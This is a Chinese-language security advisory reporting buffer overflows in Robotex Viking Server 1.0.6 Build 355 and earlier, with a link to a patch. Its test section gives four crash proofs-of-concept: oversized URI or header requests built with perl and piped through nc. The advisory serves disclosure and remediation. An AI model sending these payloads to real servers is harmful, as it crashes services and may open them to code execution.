Robotex Viking Server 缓冲区溢出漏洞

发布日期：2000-08-29
更新日期：2000-08-29

受影响系统：

Robotex Viking Server 1.0.6 Build 355 以及更低版本
- Microsoft Windows 95
- Microsoft Windows NT 4.0

不受影响系统：

Robotex Viking Server 1.0.6 Build 370 以及更高版本
- Microsoft Windows 95
- Microsoft Windows NT 4.0

描述：

---

Robotex Viking Server中存在几处缓冲区溢出，于是恶意的用户可能使服务崩溃，
甚至执行任意代码。

<* 来源：Aviram Jenik (aviram@beyondsecurity.com) *>







测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下列命令导致Viking Server崩溃：

1)
GET [x11765] HTTP/1.1<回车><回车>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

2)
GET / HTTP/1.1<回车>
Unless-Modified-Since: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

3)
GET / HTTP/1.1<回车>
If-Range: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

4)
GET / HTTP/1.1<回车>
If-Modified-Since: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)


建议：

---

Robotex发布了如下补丁：

Robotex Viking Server 1.0.6 Build 355 及其以前版本：
http://www.robtex.com/files/viking/beta/viking.zip

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有